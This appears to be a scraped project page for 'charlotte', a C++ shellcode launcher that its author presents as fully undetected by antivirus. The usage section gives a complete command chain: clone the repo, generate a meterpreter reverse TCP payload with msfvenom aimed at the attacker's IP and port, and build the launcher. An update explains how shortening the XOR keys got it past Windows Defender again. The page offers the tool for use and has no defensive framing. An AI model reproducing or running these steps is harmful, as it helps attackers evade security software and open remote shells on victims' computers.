.png)
3 years ago
159 
c++ fully undetected shellcode launcher ;)
releasing this to celebrate the birth of my newborn
description
13/05/2021:
c++ shellcode launcher, fully undetected 0/26 as of 13th May 2021. dynamic invoking of win32 api functions XOR encryption of shellcode and function names randomised XOR keys and variables per run on Kali Linux, simply 'apt-get install mingw-w64*' and thats it!17/05/2021:
random strings length and XOR keys lengthantiscan.me
usage
git clone the repository, generate your shellcode file with the naming beacon.bin, and run charlotte.py
example:
git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64* cd charlotte msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin python charlotte.py profittested with msfvenom -p (shown in the .gif POC below) and also cobalt strike raw format payload
update v1.1
17/05/21:
apparently Microsoft Windows Defender was able to detect the .DLL binary,
and how did they flag it? by looking for several XOR keys of 16 byte size
changing it to 9 shown in the POC .gif below shows it is now undetected again
cheers!
Bengali (Bangladesh) · 
English (United States) ·